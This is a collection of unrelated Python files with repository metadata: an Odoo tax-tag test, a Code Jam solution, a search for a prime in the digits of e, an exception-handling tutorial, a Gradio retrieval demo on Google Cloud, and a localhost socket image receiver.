            In case of failure display the couple (chart_template_xml_id, tax_report_line_xml_id).
            The test doesn't fail for unreferenced chart_template or unreferenced tax_report_line.
        """
        chart_templates = self.env['account.chart.template'].search([])
        for chart_template in chart_templates:
            [chart_template_xml_id] = chart_template.get_xml_id().values()
            oss_tags = EU_TAG_MAP.get(chart_template_xml_id, {})
            # Only non-empty xml_ids in the map are checked for existence.
            for tax_report_line_xml_id in filter(lambda d: d, oss_tags.values()):
                with self.subTest(chart_template_xml_id=chart_template_xml_id, tax_report_line_xml_id=tax_report_line_xml_id):
                    tag = self.env.ref(tax_report_line_xml_id, raise_if_not_found=False)
                    self.assertIsNotNone(tag, f"The following xml_id is incorrect in EU_TAG_MAP.py:{tax_report_line_xml_id}")
| anhjean/beanbakery_v15 | addons/l10n_eu_oss/tests/test_oss.py | test_oss.py | py | 3,836 | python | en | code | 5 | github-code | 50 |
# Google Code Jam 2014 "Magic Trick": the volunteer picks a row twice from a
# 4x4 grid; the chosen card is the single number common to both rows.
f = open('A-small-attempt0.in')
out = open('a.txt', 'w')
# First line of the input: number of test cases.
T = int(f.readline().strip())
for case in range(T):
    # First answer: row index (1-4); keep only that row's 4 numbers.
    row1 = int(f.readline().strip())
    for i in range(row1-1):
        f.readline()
    set1 = set(int(i) for i in f.readline().strip().split())
    for i in range(4-row1):
        f.readline()
    # Second answer on the rearranged grid, read the same way.
    row2 = int(f.readline().strip())
    for i in range(row2-1):
        f.readline()
    set2 = set(int(i) for i in f.readline().strip().split())
    for i in range(4-row2):
        f.readline()
    # Exactly one common number -> that's the card; several -> the magician
    # can't tell; none -> the volunteer lied.
    ans = set1 & set2
    if len(ans) == 1:
        output = str(ans.pop())
    elif len(ans) > 1:
        output = 'Bad magician!'
    else:
        output = 'Volunteer cheated!'
    out.write('Case #%d: %s\n' % (case+1, output))
out.close()
f.close()
| wind1900/exercise | codejam2014/A.py | A.py | py | 754 | python | en | code | 2 | github-code | 50 |
def isprime(n):
    """Return True when abs(int(n)) is prime (trial division by odd numbers)."""
    n = abs(int(n))
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    # Only odd divisors up to sqrt(n) need checking.
    divisor = 3
    while divisor * divisor <= n:
        if n % divisor == 0:
            return False
        divisor += 2
    return True
def z(contfrac, a=1, b=0, c=0, d=1):
    """Stream decimal digits of the value of continued fraction `contfrac`.

    Maintains the state (a, b, c, d) of a linear fractional transform
    (a*x + b)/(c*x + d): each CF term x is absorbed into the state, and a
    decimal digit is emitted whenever the integer parts a//c and b//d agree
    (so the digit no longer depends on the unseen tail of the fraction).
    If `contfrac` is finite, the remaining digits of the rational a/c are
    flushed via rdigits().
    """
    for x in contfrac:
        # Emit digits while they are determined by the current state.
        while a > 0 and b > 0 and c > 0 and d > 0:
            t = a // c
            t2 = b // d
            if not t == t2:
                break
            yield (t)
            # Remove the emitted digit and shift one decimal place.
            a = (10 * (a - c*t))
            b = (10 * (b - d*t))
        # continue with same fraction, don't pull new x
        # Absorb the next continued-fraction term into the transform.
        a, b = x*a+b, a
        c, d = x*c+d, c
    # Finite input: flush the remaining digits of a/c by long division.
    for digit in rdigits(a, c):
        yield (digit)
def rdigits(p, q):
    """Yield the decimal digits of the rational p/q by long division.

    Terminates only when the remainder reaches zero, i.e. when p/q has a
    finite decimal expansion; otherwise yields digits forever.
    """
    while p > 0:
        if p > q:
            # Still an integer part left: emit it whole.
            digit = p // q
            p -= q * digit
        else:
            # Fractional part: bring down a decimal place, emit one digit.
            digit = (10 * p) // q
            p = 10 * p - q * digit
        yield digit
def e_cf_expansion():
    """Yield the simple continued fraction terms of e: 1, 0, 1, 1, 2, 1, 1, 4, ...

    After the leading 1, the pattern repeats as (2k, 1, 1) for k = 0, 1, 2, ...
    """
    yield 1
    even_term = 0
    while True:
        yield even_term
        even_term += 2
        yield 1
        yield 1
# Generator over the decimal digits of e (2, 7, 1, 8, 2, 8, ...).
def e_dec():return z(e_cf_expansion())
# Return the first n digits of e concatenated as a string (no decimal point).
def e_gen(n):
    gen = e_dec()
    e = [str(next(gen)) for i in range(n)]
    #e.insert(1, '.')#inserting decimal
    return(''.join(e))
#window loop
# Slide a 10-digit window over the digits of e until the window is prime.
for location in range(1000):
    # NOTE(review): e_gen(10000) recomputes all 10000 digits on every
    # iteration; hoisting it out of the loop would be much faster.
    num = int(e_gen(10000)[location:(10+location)])
    val = isprime(num)
    if val== True:
        print (num)
        break
#from google challenge in 2007 for a job at google
| cmrfrd/Random-Python | googlechallenge.py | googlechallenge.py | py | 1,466 | python | en | code | 0 | github-code | 50 |
# Demonstrations of Python exception handling (try/except/else/finally).

try:
    4/0
except ZeroDivisionError as e:
    # 4/0 alone raises ZeroDivisionError; catching it and printing `e`
    # shows the error message instead of crashing.
    print(e)

try:
    f = open('none', 'r')
except FileNotFoundError as e:
    # BUGFIX: opening a missing file for reading raises FileNotFoundError,
    # not FileExistsError as the original caught (which let the error escape).
    print(str(e))
else:
    # Runs only when the try block raised nothing.
    data = f.read()
    print(data)
    f.close()

a = open('apple.txt', 'w')
try:
    # Reading a file opened for writing fails; the generic Exception
    # handler below catches it since the exact type is unknown here.
    data = a.read()
    print(data)
except Exception as e:
    print(e)
finally:
    # BUGFIX: the original had `f.close` — the wrong variable and a missing
    # call — so the file opened above was never closed.
    a.close()

# Handling several exception types with separate except clauses.
try:
    a = [1,2]
    print(a[3])
    4/0
except ZeroDivisionError:
    print("0으로 나눌 수 없습니다.")
except IndexError:
    print("인덱싱할 수 없습니다.")

# Deliberately ignoring an expected error with pass.
try:
    f = open("없는파일", 'r')
except FileNotFoundError:
    pass

# Raising an error on purpose: subclasses must override fly().
class Bird:
    def fly(self):
        raise NotImplementedError

class Eagle(Bird):
    def fly(self):
        print("very fast")

eagle = Eagle()
eagle.fly()
# Deliberately raising an error
# raise뒤에 오류이름을 작성하면 오류가 발생한다. | SIRIJEONG/python | test39.py | test39.py | py | 1,430 | python | ko | code | 0 | github-code | 50 |
# -*- coding: utf-8 -*-
"""Exercise 3: Area of a Room.

Prompt the user for the width and length of a room (entered as floating
point numbers, in feet) and display the computed area in square feet.
"""
width = input("Enter width of the room(ft):")
length = input("Enter length of the room(ft):")
# input() returns strings; convert both to float before multiplying.
area = float(width) * float(length)
print("Area of the room: ", area, " square ft.")
| grypy/Introduction_Exercises | Room_Area.py | Room_Area.py | py | 653 | python | en | code | 0 | github-code | 50 |
2269258358 | #%%
import time
import asyncio
import pandas as pd
import gradio as gr
from utils import google
from utils.credentials import *
# Connection/configuration settings for the GCP-backed RAG pipeline
# (Cloud SQL pgvector instance + Document AI processor).
variables = {
    "project_id": "vtxdemos",
    "region": "us-central1",
    "instance_name": "pg15-pgvector-demo",
    "database_user": "emb-admin",
    "database_password": DATABASE_PASSWORD,
    "database_name": "rag-pgvector-langchain-1",
    "docai_processor_id": "projects/254356041555/locations/us/processors/5f0b0deeb0a5d23b",
    "location": "us"
}
# Shared client wrapping OCR, embeddings, vector DB, and LLM calls.
client = google.Client(variables)
async def db_functions(documents, query):
    """Create the vector table, insert `documents`, and run `query` against it.

    Returns the query matches from the vector database.
    """
    await client.create_table()
    await client.insert_documents_vdb(documents)
    return await client.query(query)
# %%
# LLM prompt + context
def greet(file, name):
    """Gradio handler: OCR + embed `file`, query the vector DB with `name`,
    and answer via the LLM.

    Returns the LLM response plus timing strings for the OCR, embedding,
    and vector-DB stages.
    """
    documents, ocr_time, embeddings_time = client.prepare_file(file.name)
    # Time only the vector-DB round trip (table create + insert + query).
    start = time.time()
    matches = asyncio.run(db_functions(documents, name))
    vdb_time = time.time() - start
    # Feed the matches to the LLM as JSON context.
    response = client.llm_predict(name, context=pd.DataFrame(matches).to_json())
    # (Removed an unused `x = str(response)` local from the original.)
    return str(response), f"ocr time: {ocr_time}", f"embeddings time: {embeddings_time}", f"vdb time: {vdb_time}"
# Gradio UI: a file upload plus a question box, returning the answer and
# the three stage timings produced by greet().
demo = gr.Interface(
    greet,
    inputs=["file","text"],
    outputs=["text", "text", "text", "text"],
    title="Tax Return Analytics",
    description="Tax Return Deloitte",
    article="Jesus C",
    css=".gradio-container {background-color: neutral}",
    theme=gr.themes.Soft()
)
if __name__ == "__main__":
    demo.launch(show_api=True, debug=True)
| jchavezar/vertex-ai-samples | gen_ai/rag/rag_upload_while_query_vertex.py | rag_upload_while_query_vertex.py | py | 1,518 | python | en | code | 10 | github-code | 50 |
13127491780 | import socket
import struct
import time
from PIL import Image
def recvall(receiver, buffer_size=65536):
    """Read from `receiver` until a short read, returning all bytes received.

    NOTE(review): this treats the first chunk shorter than `buffer_size` as
    end-of-message, but TCP may legitimately deliver short reads mid-stream
    (and recv() returns b'' on close) — confirm against the sender protocol.
    """
    data_buffer = b''
    data_chunk=receiver.recv(buffer_size)
    # Keep accumulating while every chunk comes back completely full.
    while len(data_chunk) >= buffer_size:
        data_buffer+=data_chunk
        data_chunk=receiver.recv(buffer_size)
    # Append the final (short) chunk.
    data_buffer+=data_chunk
    return data_buffer
def get_shape(sock):
    """Read up to 64 bytes holding a comma-separated size string (e.g.
    b'800,600') from `sock` and return it as a tuple of ints.
    """
    shape = sock.recv(64)
    # Decode the bytes directly.  The original sliced str(bytes) to strip
    # the "b'...'" repr, which breaks on any byte that repr() escapes.
    return tuple(map(int, shape.decode('ascii').split(',')))
def display(pixel_data,shape):
    """Show `pixel_data` (raw RGB bytes) as an image of size `shape` (w, h)."""
    image = Image.frombytes("RGB", shape, pixel_data, 'raw')
    image.show()
def join_image(image_parts):
    """Concatenate string image fragments into one string.

    NOTE(review): unused in this module; the pixel data elsewhere is bytes,
    for which ''.join would raise TypeError — b''.join would be needed.
    """
    return ''.join(image_parts)
def receive(host='127.0.0.1', port=1300):
    """Connect to the frame sender and return (pixel_data, shape).

    Protocol: send a ready message, read the image shape, then read the raw
    RGB pixel bytes until a short read (see recvall).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as receiver:
        receiver.connect((host, port))
        receiver.send(bytes('im ready','utf-8'))
        shape = get_shape(receiver)
        pixel_data = recvall(receiver)
        return pixel_data,shape
if __name__ == "__main__":
    # Fetch one frame from the default sender and display it.
    display(*receive())
| Trevahok/Python-VNC | trev_receiver.py | trev_receiver.py | py | 999 | python | en | code | 1 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.